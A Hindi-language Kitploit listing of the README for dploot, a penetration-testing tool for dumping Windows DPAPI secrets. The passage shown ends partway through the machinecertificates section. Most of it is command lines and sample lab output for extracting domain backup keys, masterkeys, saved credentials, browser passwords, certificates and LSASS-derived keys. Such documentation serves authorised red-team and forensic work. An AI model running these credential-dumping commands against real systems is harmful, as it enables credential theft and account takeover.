Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
dploot — Python में दूरस्थ तथा स्थानीय रूप से DPAPI लूटना | Kitploit
उपकरण/GitHubGitHub/zblurx/dploot
एन्क्रिप्शन/डिक्रिप्शन उपकरणपोस्ट-शोषणडिजिटल फोरेंसिकपेनिट्रेशन टेस्टिंगक्लाउड सुरक्षारेड टीमिंग
GitHubzblurx/dploot

dploot

Python में दूरस्थ तथा स्थानीय रूप से DPAPI लूटना

रिपॉजिटरी देखें
555753 दिन पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

dploot

dploot SharpDPAPI का Python पुनर्लेखन है, जिसे Harmj0y द्वारा C# में लिखा गया है, और यह स्वयं gentilkiwi द्वारा Mimikatz से DPAPI का पोर्ट है। यह इन उपकरणों के सभी DPAPI तर्क को लागू करता है, लेकिन इस बार इसे Python इंटरप्रेटर और Linux वातावरण से उपयोग किया जा सकता है।

यदि आप नहीं जानते कि DPAPI क्या है, इस पोस्ट को देखें।

विषय-सूची

  • dploot
    • विषय-सूची
    • स्थापना
    • उपयोग
      • Kerberos
    • उपयोग कैसे करें
      • मशीन पर स्थानीय व्यवस्थापक के रूप में
      • Windows फ़ाइल सिस्टम तक ऑफ़लाइन पहुंच के साथ
      • डोमेन व्यवस्थापक (या समकक्ष) के रूप में
      • डोमेन व्यवस्थापक के रूप में नहीं
    • कमांड
      • यूज़र ट्राइएज
        • masterkeys
        • credentials
        • vaults
        • rdg
        • certificates
        • browser
        • triage
      • मशीन ट्राइएज
        • machinemasterkeys
        • machinecredentials
        • machinevaults
        • machinecertificates
        • machinetriage
      • विविध
        • wifi
        • sccm
        • backupkey
        • mobaxterm
        • wam
        • blob
    • श्रेय

स्थापना

आप dploot को pipx के साथ सीधे PyPI से स्थापित कर सकते हैं:```text pipx install git+https://github.com/zblurx/dploot.git

root@kitploit:~
या```text
pipx install dploot

Kali Linux पर, आप रिपॉजिटरी से dploot स्थापित कर सकते हैं:```text sudo apt install python3-dploot

root@kitploit:~
## उपयोग```text
dploot (https://github.com/zblurx/dploot) v3.1.2 by @_zblurx
usage: dploot [-h]
              {backupkey,blob,browser,certificates,credentials,machinecertificates,machinecredentials,machinemasterkeys,machinetriage,machinevaults,masterkeys,mobaxterm,rdg,sccm,triage,vaults,wam,wifi} ...

DPAPI looting locally remotely in Python

positional arguments:
  {backupkey,blob,browser,certificates,credentials,machinecertificates,machinecredentials,machinemasterkeys,machinetriage,machinevaults,masterkeys,mobaxterm,rdg,sccm,triage,vaults,wam,wifi}
                        Action
    backupkey           Backup Keys from domain controller
    blob                Decrypt DPAPI blob. Can fetch masterkeys on target
    browser             Dump users credentials and cookies saved in browser from local or remote target
    certificates        Dump users certificates from local or remote target
    credentials         Dump users Credential Manager blob from local or remote target
    machinecertificates
                        Dump system certificates from local or remote target
    machinecredentials  Dump system credentials from local or remote target
    machinemasterkeys   Dump system masterkey from local or remote target
    machinetriage       Loot SYSTEM Masterkeys (if not set), SYSTEM credentials, SYSTEM certificates and SYSTEM vaults from local or remote target
    machinevaults       Dump system vaults from local or remote target
    masterkeys          Dump users masterkey from local or remote target
    mobaxterm           Dump Passwords and Credentials from MobaXterm
    rdg                 Dump users saved password information for RDCMan.settings from local or remote target
    sccm                Dump SCCM secrets (NAA, Collection variables, tasks sequences credentials) from local or remote target
    triage              Loot Masterkeys (if not set), credentials, rdg, certificates, browser and vaults from local or remote target
    vaults              Dump users Vaults blob from local or remote target
    wam                 Dump users cached azure tokens from local or remote target
    wifi                Dump wifi profiles from local or remote target

options:
  -h, --help            show this help message and exit

Kerberos

dploot Kerberos के साथ प्रमाणीकरण कर सकता है। बस -k विकल्प का उपयोग करें। यदि आप कैश्ड टिकट का उपयोग करना चाहते हैं, तो -use-kcache विकल्प का उपयोग करें।

उपयोग कैसे करें

dploot का लक्ष्य Linux बॉक्स से DPAPI संबंधित लूट को सरल बनाना है। SharpDPAPI की तरह, आप इस टूल का उपयोग कैसे करते हैं यह इस पर निर्भर करेगा कि आपने डोमेन से समझौता किया है या नहीं।

मशीन पर स्थानीय व्यवस्थापक के रूप में

जब भी आप Windows कंप्यूटर के स्थानीय व्यवस्थापक होते हैं, तो आप मशीन के रहस्यों को लूट सकते हैं, उदाहरण के लिए machinecertificates के साथ (या कोई अन्य Machine Triage कमांड, या wifi कमांड):```text $ dploot machinecertificates -d waza.local -u Administrator -p 'Password!123' -t 192.168.56.14 -quiet [-] Writting certificate to DESKTOP-OJ3N8TJ.waza.local_796449B12B788ABA.pfx

root@kitploit:~
### विंडोज़ फ़ाइलसिस्टम तक ऑफ़लाइन पहुंच के साथ

किसी सिस्टम तक स्थानीय व्यवस्थापक पहुंच प्राप्त करने का एक अलग तरीका, उदाहरण के लिए भौतिक पहुंच के माध्यम से, ड्राइव को निकालकर और फ़ाइलसिस्टम को सीधे अपनी मशीन पर माउंट करके। इस मोड का उपयोग करने के लिए, लक्ष्य के रूप में `LOCAL` निर्दिष्ट करें। डिफ़ॉल्ट रूप से लक्षित फ़ाइलसिस्टम वर्तमान निर्देशिका होने की उम्मीद है, आप `-root` के साथ एक अलग पथ निर्दिष्ट कर सकते हैं:```text
$ dploot sccm -root /media/C_drive/ -t LOCAL
[*] Connected to LOCAL as \ (admin)

वैध उपयोगकर्ता नाम और पासवर्ड को तर्क के रूप में देना अभी भी उपयोगी हो सकता है, जिनका उपयोग मास्टरकी को डिक्रिप्ट करने के लिए किया जाएगा (नीचे User Triage में दिए गए निर्देश देखें):```text $ dploot masterkeys -root /mnt -u bob -p Password -t LOCAL [*] Connected to LOCAL as \bob (admin)

root@kitploit:~
### एक डोमेन व्यवस्थापक के रूप में (या समकक्ष)

यदि आपके पास डोमेन व्यवस्थापक विशेषाधिकार हैं, तो आप backupkey कमांड के साथ डोमेन DPAPI बैकअप कुंजी प्राप्त कर सकते हैं। यह कुंजी डोमेन उपयोगकर्ताओं और कंप्यूटरों के लिए किसी भी DPAPI मास्टरकी को डिक्रिप्ट कर सकती है, और यह कभी नहीं बदलेगी। इसलिए, यह कुंजी एक हमलावर को डोमेन उपयोगकर्ता से संबंधित किसी भी DPAPI-संरक्षित पासवर्ड को लूटने की अनुमति देती है।

डोमेन बैकअपकी प्राप्त करने के लिए, आप [backupkey](#backupkey) कमांड का उपयोग कर सकते हैं:```text
$ dploot backupkey -d waza.local -u Administrator -p 'Password!123' -t 192.168.56.112 -quiet
[-] Exporting domain backupkey to file key.pvk

फिर आप नेटवर्क पर Windows डोमेन-जॉइन कंप्यूटर पर संग्रहीत किसी भी उपयोगकर्ता रहस्य को लूट सकते हैं, उदाहरण के लिए certificates कमांड (या कोई अन्य User Triage कमांड्स) के साथ:``` $ dploot certificates -d waza.local -u Administrator -p 'Password!123' -t 192.168.56.14 -pvk key.pvk -quiet [-] Writting certificate to jsmith_waza.local_C0F800ECBA7BE997.pfx [-] Writting certificate to jsmith_waza.local_D0C73E2C04BEAAB0.pfx [-] Writting certificate to m.scott_waza.local_EB9C21A5642D4EBD.pfx

root@kitploit:~
### डोमेन व्यवस्थापक के रूप में नहीं

यदि डोमेन व्यवस्थापक विशेषाधिकार अभी तक प्राप्त नहीं हुए हैं, तो Mimikatz के sekurlsa::dpapi कमांड का उपयोग करने से किसी दिए गए सिस्टम पर लोड की गई किसी भी मास्टर कुंजी (उपयोगकर्ता और SYSTEM) की DPAPI मास्टरकी {GUID}:SHA1 मैपिंग प्राप्त होगी (टिप: कुंजी निष्कर्षण के बाद dpapi::cache चलाने से आपको एक अच्छी तालिका मिलेगी)। यदि आप इन कुंजियों को {GUID1}:SHA1 {GUID2}:SHA1... प्रकार के प्रारूप में बदलते हैं, तो उन्हें बॉक्स की जाँच (triage) करने के लिए dploot को आपूर्ति की जा सकती है। आप डिक्रिप्टेड मास्टरकी हासिल करने के लिए [lsassy](https://github.com/Hackndo/lsassy) का भी उपयोग कर सकते हैं:```text
$ lsassy -u Administrator -p 'Password!123' -d waza.local -t 192.168.56.14 -m rdrleakdiag -M masterkeys
[+] 192.168.56.14 Authentication successful
[+] 192.168.56.14 Lsass dumped in C:\Windows\Temp\ff32F.fon (57121318 Bytes)
[+] 192.168.56.14 Lsass dump deleted
[+] 192.168.56.14 WAZA\DESKTOP-OJ3N8TJ$        [NT] 0e43c22a4b09520cf79ca19a9e1bbec7 | [SHA1] 2ce587ab64aa3488c5ed412ca1e554d0f8e5a411
(snip)
[+] 192.168.56.14 5 masterkeys saved to /data/masterkeys

फिर आप इस मास्टरकी फ़ाइल का उपयोग लक्षित कंप्यूटर को लूटने के लिए कर सकते हैं, उदाहरण के लिए browser कमांड (या कोई अन्य User Triage कमांड) के साथ:```text $ dploot browser -d waza.local -u Administrator -p 'Password!123' -t 192.168.56.14 -mkfile /data/masterkeys [*] Connected to 192.168.56.14 as waza.local\Administrator (admin)

[*] Triage Browser Credentials for ALL USERS

[MSEDGE LOGIN DATA] URL: Username: [email protected] Password: Waza1234

root@kitploit:~
आप [dploot masterkeys](#masterkeys) के `-hashes-outputfile` विकल्प के साथ masterkey हैश भी डंप कर सकते हैं।

## कमांड्स

### यूज़र ट्राइएज

#### masterkeys

**masterkeys** कमांड किसी भी यूज़र masterkey फ़ाइल को प्राप्त करेगा और उन्हें `-passwords FILE` के user:password कॉम्बो, `-nthashes` के user:nthash कॉम्बो, या `-pvk PVKFILE` डोमेन बैकअप कुंजी से डिक्रिप्ट करेगा। यह masterkey {GUID}:SHA1 मैपिंग का एक सेट लौटाएगा। ध्यान दें कि यह उस पासवर्ड या nthash का उपयोग करने का प्रयास करेगा जिसका उपयोग आपने लक्ष्य से कनेक्ट करने के लिए किया था, भले ही आप संबंधित विकल्प निर्दिष्ट न करें। आप अंततः `-hashes-outputfile` का उपयोग करके Hashcat/JtR प्रारूप में सभी masterkey हैश प्राप्त कर सकते हैं, ताकि क्लियरटेक्स्ट पासवर्ड को क्रैक किया जा सके।

*डोमेन बैकअप कुंजी के साथ:*```text
$ dploot masterkeys -d waza.local -u Administrator -p 'Password!123' -t 192.168.57.5 -pvk key.pvk
[*] Connected to 192.168.57.5 as waza.local\Administrator (admin)

[*] Triage ALL USERS masterkeys

{d305b55b-f0ca-40cf-b04c-3620aa5da427}:6f45f9ee77014df8a68104abd0e8d5eadb3d9f22
{d37fa151-d670-4c58-9d70-3233b4918942}:8709574524ad35ef0b3a114b93990f8490d86cba
{68e05bd7-9de9-46f0-95e3-b5036baa49e9}:2d87a923d05534da67d449cbad9a7390d019910a

पासवर्ड के साथ:```text $ cat passwords jsmith:Password#123 $ dploot masterkeys -d waza.local -u jsmith -p 'Password#123' -t 192.168.56.14 -passwords passwords [*] Connected to 192.168.56.14 as waza.local\jsmith (admin)

[*] Triage ALL USERS masterkeys

{d305b55b-f0ca-40cf-b04c-3620aa5da427}:6f45f9ee77014df8a68104abd0e8d5eadb3d9f22 {d37fa151-d670-4c58-9d70-3233b4918942}:8709574524ad35ef0b3a114b93990f8490d86cba {68e05bd7-9de9-46f0-95e3-b5036baa49e9}:2d87a923d05534da67d449cbad9a7390d019910a

root@kitploit:~
***सुझाव***: *`outputfile` फ़्लैग के साथ, dploot masterkeys लूटी गई masterkeys को एक निर्दिष्ट फ़ाइल में जोड़ देगा। सभी masterkeys को एक ही फ़ाइल में संग्रहीत करना कोई समस्या नहीं है, क्योंकि एक DPAPI BLOB उस masterkey का GUID संग्रहीत करता है जिसकी उसे डिक्रिप्ट करने के लिए आवश्यकता होगी।*

#### credentials

**credentials** कमांड उपयोगकर्ताओं की Credential फ़ाइलों की खोज करेगा और उन्हें एक या अधिक {GUID}:SHA1 के `-mkfile FILE` के साथ, या user:password के `-passwords FILE` संयोजन के साथ, user:nthash के `-nthashes` संयोजन के साथ, या पहले masterkeys को डिक्रिप्ट करने के लिए `-pvk PVKFILE` के साथ डिक्रिप्ट करेगा।

`mkfile` के साथ:```text
$ dploot credentials -d waza.local -u Administrator -p 'Password!123' -t 192.168.57.5 -mkfile waza.mkf
[*] Connected to 192.168.57.5 as waza.local\Administrator (admin)

[*] Triage Credentials for ALL USERS

[CREDENTIAL]
LastWritten : 2022-04-12 16:55:44
Flags       : 0x00000030 (CRED_FLAGS_REQUIRE_CONFIRMATION|CRED_FLAGS_WILDCARD_MATCH)
Persist     : 0x00000003 (CRED_PERSIST_ENTERPRISE)
Type        : 0x00000002 (CRED_TYPE_DOMAIN_PASSWORD)
Target      : Domain:target=test
Description :
Unknown     :
Username    : test
Unknown     : Password#{123}

[CREDENTIAL]
LastWritten : 2022-04-27 19:23:02
Flags       : 0x00000030 (CRED_FLAGS_REQUIRE_CONFIRMATION|CRED_FLAGS_WILDCARD_MATCH)
Persist     : 0x00000002 (CRED_PERSIST_LOCAL_MACHINE)
Type        : 0x00000002 (CRED_TYPE_DOMAIN_PASSWORD)
Target      : Domain:target=TERMSRV/srv01.waza.local
Description :
Unknown     :
Username    : DESKTOP-I60R2L6\Administrator
Unknown     : Password!123

pvk के साथ:```text $ dploot credentials -d waza.local -u Administrator -p 'Password!123' -t 192.168.57.5 -pvk key.pvk [*] Connected to 192.168.57.5 as waza.local\Administrator (admin)

[*] Triage ALL USERS masterkeys

{d305b55b-f0ca-40cf-b04c-3620aa5da427}:6f45f9ee77014df8a68104abd0e8d5eadb3d9f22 {d37fa151-d670-4c58-9d70-3233b4918942}:8709574524ad35ef0b3a114b93990f8490d86cba {68e05bd7-9de9-46f0-95e3-b5036baa49e9}:2d87a923d05534da67d449cbad9a7390d019910a

[*] Triage Credentials for ALL USERS

[CREDENTIAL] LastWritten : 2022-05-19 10:25:06 Flags : 0x00000030 (CRED_FLAGS_REQUIRE_CONFIRMATION|CRED_FLAGS_WILDCARD_MATCH) Persist : 0x00000003 (CRED_PERSIST_ENTERPRISE) Type : 0x00000002 (CRED_TYPE_DOMAIN_PASSWORD) Target : Domain:target=myserver.com Description : Unknown : Username : Administrator Unknown : Naga2019*

root@kitploit:~
#### vaults

**vaults** कमांड उपयोगकर्ताओं के Vaults रहस्यों को खोजेगा और उन्हें `-mkfile FILE` के साथ डिक्रिप्ट करेगा, जिसमें एक या अधिक {GUID}:SHA1 हों, या `-passwords FILE` के साथ user:password का संयोजन, `-nthashes` के साथ user:nthash का संयोजन, या `-pvk PVKFILE` का उपयोग करके पहले masterkeys को डिक्रिप्ट करेगा।

`mkfile` के साथ:```text
$ dploot vaults -d waza.local -u jsmith -p 'Password#123' -t 192.168.56.14 -mkfile waza.local.mkf
[*] Connected to 192.168.56.14 as waza.local\jsmith (admin)

[*] Triage Vaults for ALL USERS

[VAULT_VPOL_KEYS]
Key1: 0x552f5d5b454d3a53aec4ff458539de02
Key2: 0x5565757b5acd988e1a7377030fbe7098bff3e98050ae9bca458fe554b9e2586b

[Internet Explorer]
Username        : test
Resource        : http://testphp.vulnweb.com/
Password        : b'74006500730074000000'

Decoded Password: test

pvk के साथ:```text $ dploot vaults -d waza.local -u jsmith -p 'Password#123' -t 192.168.56.14 -pvk key.pvk [*] Connected to 192.168.56.14 as waza.local\jsmith (admin)

[*] Triage ALL USERS masterkeys

{d305b55b-f0ca-40cf-b04c-3620aa5da427}:6f45f9ee77014df8a68104abd0e8d5eadb3d9f22

[*] Triage Vaults for ALL USERS

[VAULT_VPOL_KEYS] Key1: 0x552f5d5b454d3a53aec4ff458539de02 Key2: 0x5565757b5acd988e1a7377030fbe7098bff3e98050ae9bca458fe554b9e2586b

[Internet Explorer] Username : test Resource : http://testphp.vulnweb.com/ Password : b'74006500730074000000'

Decoded Password: test

root@kitploit:~
#### rdg

**rdg** कमांड उपयोगकर्ताओं की RDCMan.settings फ़ाइलों के रहस्यों की खोज करेगा और उन्हें `-mkfile FILE` के साथ डिक्रिप्ट करेगा, जिसमें एक या अधिक {GUID}:SHA1 होते हैं, या `-passwords FILE` के साथ user:password का संयोजन, `-nthashes` के साथ user:nthash का संयोजन, या पहले masterkeys को डिक्रिप्ट करने के लिए `-pvk PVKFILE` हो।

`mkfile` के साथ:```text
$ dploot rdg -d waza.local -u jsmith -p 'Password#123' -t 192.168.56.14 -mkfile waza.local.mkf
[*] Connected to 192.168.56.14 as waza.local\jsmith (admin)

[*] Triage RDCMAN Settings and RDG files for ALL USERS

[CREDENTIAL PROFILES]
	Profile Name:	WAZA\Administrator
	Username:	WAZA\Administrator
	Password:	Placeholder1234567890

[LOGON PROFILES]
	Profile Name:	Custom
	Username:	WAZA\Administrator
	Password:	Password!123

[SERVER PROFILES]
	Name:		DC01.waza.local
	Profile Name:	Custom
	Username:	WAZA\jdoe
	Password:	Password#123

[SERVER PROFILES]
	Name:		SRV01.waza.local
	Profile Name:	Custom
	Username:	WAZA\jfile
	Password:	Password#123

के साथ pvk:```text dploot rdg -d waza.local -u jsmith -p 'Password#123' -t 192.168.56.14 -pvk key.pvk [*] Connected to 192.168.56.14 as waza.local\jsmith (admin)

[*] Triage ALL USERS masterkeys

{d305b55b-f0ca-40cf-b04c-3620aa5da427}:6f45f9ee77014df8a68104abd0e8d5eadb3d9f22 {d37fa151-d670-4c58-9d70-3233b4918942}:8709574524ad35ef0b3a114b93990f8490d86cba {68e05bd7-9de9-46f0-95e3-b5036baa49e9}:2d87a923d05534da67d449cbad9a7390d019910a

[*] Triage RDCMAN Settings and RDG files for ALL USERS

[CREDENTIAL PROFILES] Profile Name: WAZA\Administrator Username: WAZA\Administrator Password: Placeholder1234567890

[LOGON PROFILES] Profile Name: Custom Username: WAZA\Administrator Password: Password!123

[SERVER PROFILES] Name: DC01.waza.local Profile Name: Custom Username: WAZA\jdoe Password: Password#123

[SERVER PROFILES] Name: SRV01.waza.local Profile Name: Custom Username: WAZA\jfile Password: Password#123

root@kitploit:~
#### certificates

**certificates** कमांड *MY* से उपयोगकर्ताओं के प्रमाणपत्र खोजेगा और उन्हें एक या अधिक {GUID}:SHA1 के `-mkfile FILE`, या उपयोगकर्ता:पासवर्ड के कॉम्बो `-passwords FILE`, उपयोगकर्ता:nthash के कॉम्बो `-nthashes`, या मास्टरकीज़ को पहले डिक्रिप्ट करने के लिए `-pvk PVKFILE` के साथ डिक्रिप्ट करेगा।

`mkfile` के साथ:```text
$ dploot certificates -d waza.local -u Administrator -p 'Password!123' -t 192.168.57.5 -mkfile waza.mkf
[*] Connected to 192.168.57.5 as waza.local\Administrator (admin)

[*] Triage Certificates for ALL USERS

Issuer:			CN=waza-ADCS1-CA,DC=waza,DC=local
Subject:		CN=John Smith,CN=Users,DC=waza,DC=local
Valid Date:		2022-05-24 09:51:33
Expiry Date:		2023-05-24 09:51:33
Extended Key Usage:
	Unknown OID (1.3.6.1.4.1.311.10.3.4)
	emailProtection (1.3.6.1.5.5.7.3.4)
	clientAuth (1.3.6.1.5.5.7.3.2)
	[!] Certificate is used for client auth!

-----BEGIN CERTIFICATE-----
MIIGDTCCBPWgAwIBAgITewAAAAJ+dBN7rSmWMAAAAAAAAjANBgkqhkiG9w0BAQ0F
ADBFMRUwEwYKCZImiZPyLGQBGRYFbG9jYWwxFDASBgoJkiaJk/IsZAEZFgR3YXph
MRYwFAYDVQQDEw13YXphLUFEQ1MxLUNBMB4XDTIyMDUyNDA5NTEzM1oXDTIzMDUy
(snip)
c/8HYJOcP6FjLmevTLLESCRCg9LG4I6NzjoRGU968HWZ5U7DGUYsCVUbzcIyJL3H
DfaOwrwiSOoINEPSRHXEn2L7gjX111h1SqKCdLQ8s9mhR1F063lZzbEfGBNG7di0
/j2bsWqbT/fCx+AgCT65VRk=
-----END CERTIFICATE-----


[-] Writting certificate to jsmith_waza.local_C0F800ECBA7BE997.pfx

pvk के साथ:```text $ dploot certificates -d waza.local -u Administrator -p 'Password!123' -t 192.168.57.5 -pvk key.pvk [*] Connected to 192.168.57.5 as waza.local\Administrator (admin)

[*] Triage ALL USERS masterkeys

{d305b55b-f0ca-40cf-b04c-3620aa5da427}:6f45f9ee77014df8a68104abd0e8d5eadb3d9f22 {d37fa151-d670-4c58-9d70-3233b4918942}:8709574524ad35ef0b3a114b93990f8490d86cba {68e05bd7-9de9-46f0-95e3-b5036baa49e9}:2d87a923d05534da67d449cbad9a7390d019910a

[*] Triage Certificates for ALL USERS

Issuer: CN=waza-ADCS1-CA,DC=waza,DC=local Subject: CN=John Smith,CN=Users,DC=waza,DC=local Valid Date: 2022-05-24 09:51:33 Expiry Date: 2023-05-24 09:51:33 Extended Key Usage: Unknown OID (1.3.6.1.4.1.311.10.3.4) emailProtection (1.3.6.1.5.5.7.3.4) clientAuth (1.3.6.1.5.5.7.3.2) [!] Certificate is used for client auth!

-----BEGIN CERTIFICATE----- MIIGDTCCBPWgAwIBAgITewAAAAJ+dBN7rSmWMAAAAAAAAjANBgkqhkiG9w0BAQ0F ADBFMRUwEwYKCZImiZPyLGQBGRYFbG9jYWwxFDASBgoJkiaJk/IsZAEZFgR3YXph MRYwFAYDVQQDEw13YXphLUFEQ1MxLUNBMB4XDTIyMDUyNDA5NTEzM1oXDTIzMDUy (snip) c/8HYJOcP6FjLmevTLLESCRCg9LG4I6NzjoRGU968HWZ5U7DGUYsCVUbzcIyJL3H DfaOwrwiSOoINEPSRHXEn2L7gjX111h1SqKCdLQ8s9mhR1F063lZzbEfGBNG7di0 /j2bsWqbT/fCx+AgCT65VRk= -----END CERTIFICATE-----

[-] Writting certificate to jsmith_waza.local_C0F800ECBA7BE997.pfx

root@kitploit:~
डिफ़ॉल्ट रूप से, टूल केवल क्लाइंट प्रमाणीकरण के लिए उपयोग किए जाने वाले प्रमाणपत्रों को लूटेगा, लेकिन `-dump-all` के साथ आप उन सभी को एकत्र कर सकते हैं।

***सुझाव***: *यदि आपको क्लाइंट प्रमाणीकरण EKU वाला प्रमाणपत्र मिलता है, तो आप [certipy](https://github.com/ly4k/Certipy) के साथ खाते पर कब्ज़ा कर सकते हैं।*

#### browser

**browser** कमांड क्रोम-आधारित ब्राउज़रों में उपयोगकर्ताओं के पासवर्ड और कुकीज़ खोजेगा, और उन्हें एक या अधिक {GUID}:SHA1 वाले `-mkfile FILE` के साथ, या user:password के `-passwords FILE` कॉम्बो, user:nthash के `-nthashes` कॉम्बो, या पहले मास्टरकीज़ को डिक्रिप्ट करने के लिए `-pvk PVKFILE` के साथ डिक्रिप्ट करेगा।

`mkfile` के साथ:```text
$ dploot browser -d waza.local -u Administrator -p 'Password!123' -t 192.168.57.5 -mkfile waza.mkf
[*] Connected to 192.168.57.5 as waza.local\Administrator (admin)

[*] Triage Browser Credentials for ALL USERS

[MSEDGE LOGIN DATA]
URL:		
Username:	admin
Password:	Password!123

pvk के साथ:```text $ dploot browser -d waza.local -u Administrator -p 'Password!123' -t 192.168.57.5 -pvk key.pvk [*] Connected to 192.168.57.5 as waza.local\Administrator (admin)

[*] Triage ALL USERS masterkeys

{d305b55b-f0ca-40cf-b04c-3620aa5da427}:6f45f9ee77014df8a68104abd0e8d5eadb3d9f22 {d37fa151-d670-4c58-9d70-3233b4918942}:8709574524ad35ef0b3a114b93990f8490d86cba {68e05bd7-9de9-46f0-95e3-b5036baa49e9}:2d87a923d05534da67d449cbad9a7390d019910a

[*] Triage Browser Credentials for ALL USERS

[MSEDGE LOGIN DATA] URL: Username: admin Password: Password!123

root@kitploit:~
संग्रहीत कुकीज़ प्रदर्शित करने के लिए, `-show-cookies` विकल्प का उपयोग करें। 

जुलाई 2024 से, [क्रोमियम-आधारित ब्राउज़र App Bound Key एन्क्रिप्शन का समर्थन करते हैं](https://security.googleblog.com/2024/07/improving-security-of-chrome-cookies-on.html). TLDR : क्रोमियम कुकीज़ (और जल्द ही पासवर्ड) को डंप करने के लिए आपको उपयोगकर्ता और SYSTEM दोनों की मास्टरकीज़ को डिक्रिप्ट करना होगा। यह विकल्प `-v20-support` फ्लैग के साथ समर्थित है। 

#### triage

**triage** कमांड उपयोगकर्ता [credentials](#credentials), [vaults](#vaults), [rdg](#rdg), और [certificates](#certificates) कमांड चलाता है।

### मशीन Triage

#### machinemasterkeys

**machinemasterkeys** कमांड DPAPI_SYSTEM कुंजी प्राप्त करने के लिए RemoteRegistry के साथ LSA सीक्रेट डंप करेगा, जिसका उपयोग मिली हुई किसी भी मशीन मास्टरकी को डिक्रिप्ट करने के लिए किया जाएगा। यह masterkey {GUID}:SHA1 मैपिंग का एक सेट लौटाएगा।```text
$ dploot machinemasterkeys -d waza.local -u Administrator -p 'Password!123' -t 192.168.57.5
[*] Connected to 192.168.57.5 as waza.local\Administrator (admin)

[*] Triage SYSTEM masterkeys

{b5ebf413-65bd-4ee7-aa49-2a3110f678d2}:ad7475c1efdf3e834037bead151e30beaefeb349
{c1027a5b-0dcc-4237-af05-19839a94c12f}:fda0c774f6a8ff189ef2759a151f2c6bcf6a4d46
{e1a73282-709b-4717-ace0-00eecb280fcc}:cdb4c86722b50cecf87cf683c6d727f36d760dba
{6fbe7c89-9810-4ce3-b841-f0f1dd8b46e6}:1fb57eb358ea26c617d39ce04c5feb613ab10b89
{750630e8-b603-4d43-941e-6f756073e511}:f9fd650d02a09e92069c54465455feeea12f0049
{9a4057a3-06f2-4e4f-9a88-79ea3c3cadfa}:5b966689d74393684a221752950b46fb5236b3db

machinecredentials

machinecredentials कमांड किसी भी मिली हुई machine Credentials फ़ाइल को प्राप्त करेगा और उन्हें एक या अधिक {GUID}:SHA1 वाले -mkfile FILE के साथ डिक्रिप्ट करेगा, अन्यथा dploot किसी भी machine masterkeys को डिक्रिप्ट करने के लिए DPAPI_SYSTEM LSA सीक्रेट कुंजी डंप करेगा, और फिर मिली किसी भी एन्क्रिप्टेड DPAPI XXX ब्लॉब को डिक्रिप्ट करेगा।```text $ dploot machinecredentials -d waza.local -u Administrator -p 'Password!123' -t 192.168.57.5 [*] Connected to 192.168.57.5 as waza.local\Administrator (admin)

[*] Triage SYSTEM masterkeys

{07e6e8d6-7eae-4780-9aac-641818ddd9bb}:ddb9fa17d4e9ab12[...] {a87bcad8-5ed9-4f09-a9f7-34d77e20d0d4}:e4661cd36f07bb1f[...] {d03a0e3b-b616-4a29-8795-9ca09960de35}:a45fdd01699bfbc5[...] {69b3f620-eca1-45c1-a003-f1d0a8598c57}:2862216b21e96fa6[...] {9a270191-3f43-46d1-9935-5892dca2a9a2}:d3cb43dd6645d26d[...] {e85c4ab7-65d3-45df-9abe-829c2ead1c5f}:c2a118094fb7cf85[...]

[*] Triage SYSTEM Credentials

[CREDENTIAL] LastWritten : 2022-05-06 15:51:53 Flags : 0x00000030 (CRED_FLAGS_REQUIRE_CONFIRMATION|CRED_FLAGS_WILDCARD_MATCH) Persist : 0x00000002 (CRED_PERSIST_LOCAL_MACHINE) Type : 0x00000002 (CRED_TYPE_DOMAIN_PASSWORD) Target : Domain:batch=TaskScheduler:Task:{31424469-6CCD-4137-8DFF-541872FD3CBB} Description : Unknown : Username : WAZA\Administrator Unknown : Password!123

root@kitploit:~
#### machinevaults

**machinevaults** कमांड किसी भी मिली हुई machine Vaults फ़ाइल को प्राप्त करेगा और उन्हें एक या अधिक {GUID}:SHA1 के `-mkfile FILE` के साथ डिक्रिप्ट करेगा, अन्यथा dploot किसी भी machine masterkeys को डिक्रिप्ट करने के लिए DPAPI_SYSTEM LSA secret key डंप करेगा, और फिर किसी भी मिले एन्क्रिप्टेड DPAPI Vaults blob को डिक्रिप्ट करेगा।```text
$ dploot machinevaults -d waza.local -u jsmith -p 'Password#123' -t 192.168.56.14
[*] Connected to 192.168.56.14 as waza.local\jsmith (admin)

[*] Triage SYSTEM masterkeys

{c1027a5b-0dcc-4237-af05-19839a94c12f}:fda0c774f6a8ff189ef2759a151f2c6bcf6a4d46
{e1a73282-709b-4717-ace0-00eecb280fcc}:cdb4c86722b50cecf87cf683c6d727f36d760dba
{6fbe7c89-9810-4ce3-b841-f0f1dd8b46e6}:1fb57eb358ea26c617d39ce04c5feb613ab10b89
{750630e8-b603-4d43-941e-6f756073e511}:f9fd650d02a09e92069c54465455feeea12f0049

[*] Triage SYSTEM Vaults

[VAULT_VPOL_KEYS]
Key1: 0x8a3dad10ce6ae44ba1700d1060cc28c4
Key2: 0x1514dd2c8f278ac517cf1ae09255aeaff62219a019bc21ac35321c040064b0b5

machinecertificates

machinecertificates कमांड किसी भी मिली मशीन निजी कुंजी फ़ाइल को प्राप्त करेगा और उन्हें एक या अधिक {GUID}:SHA1 वाले -mkfile FILE के साथ डिक्रिप्ट करेगा, अन्यथा dploot किसी भी मशीन मास्टरकी को डिक्रिप्ट करने के लिए DPAPI_SYSTEM LSA सीक्रेट कुंजी डंप करेगा, और फिर किसी भी मिले एन्क्रिप्टेड DPAPI निजी कुंजी blob को डिक्रिप्ट करेगा।

यह RemoteRegistry के साथ मशीन CAPI प्रमाणपत्र blob को भी डंप करेगा।```text $ dploot machinecertificates -d waza.local -u Administrator -p 'Password!123' -t 192.168.57.5 [*] Connected to 192.168.57.5 as waza.local\Administrator (admin)

[*] Triage SYSTEM masterkeys

